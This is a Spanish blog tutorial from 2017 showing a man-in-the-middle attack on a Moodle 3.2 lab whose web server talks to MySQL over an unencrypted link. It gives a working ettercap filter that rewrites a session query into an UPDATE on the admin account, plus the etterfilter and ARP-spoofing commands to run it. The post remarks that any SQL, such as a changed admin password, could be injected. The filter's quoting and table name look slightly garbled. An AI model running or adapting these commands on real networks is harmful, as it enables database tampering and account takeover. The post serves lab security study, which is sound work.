domingo, 15 de enero de 2017

Ataque a Moodle 3.2 | Network Packet Manipulation

Definición:

El ataque network packet manipulation sucede, cuando en una auditoría interna la web que está alojada en un servidor se conecta a una BD que está en otro servidor, y la conexión entre ambos no va cifrada, pudiendo así hacer un MITM y cambiando las consultas SQL.

Si quereis saber más de este tema os recomiendo ver el vídeo de Pablo González.

Requisitos:

Ubuntu 16:
    mysql-server

Windows 7:
    xampp
        moodle
    heidiSQL

Kali Linux:
    ettercap
    wireshark

Diagrama de red:

Ubuntu 16 -- MySQL -- 192.168.1.13

Windows 7 -- Moodle -- 192.168.1.8

Kali Linux -- Atacante -- 192.168.1.7

Tutorial:

Una vez tengamos todos los requisitos, podemos comenzar con el ataque.

Lo primero tendremos que crear un filtro para ettercap el cual permitirá modificar la consulta SQL que capturemos en un paquete, el filtro es el siguiente:

if (tcp.dst == 3306 && search(DECODED.data, "SET SESSION"))
{
        msg("MDL SET SESSION Detected!");
        replace("\x2b\x00\x00","\x3d\x00\x00");
        replace("SET SESSION sql_mode = 'STRICT_ALL_TABLES'","UPDATE ndl_user set city = "OWNED" where username = 'admin'#);
        msg("User modified!");
}

Ahora lo convertimos en un filtro para ettercap con el comando:

etterfilter <nombre filtro> -o <nombre filtro>.ef

Lanzaremos el filtro haciendo un MITM con el comando:

ettercap -T -q -i <Interfaz de red> -F <filtro> -M ARP /<IP BD>// /<IP MOODLE>//

Con esto ya estaremos en medio de la conexión y en cuanto la máquina que tiene el moodle tenga que interactuar con la base de datos nuestro filtro actuará actualizando el atributo "city" y cambiandola por "OWNED", esto es solo un ejemplo, pero podríamos hacer cualquier consulta SQL, como crear un usuario nuevo o cambiar la contraseña de administrador del moodle.

Vídeo PoC:

 

Previous Post
Next Post

post written by:

1 comentario: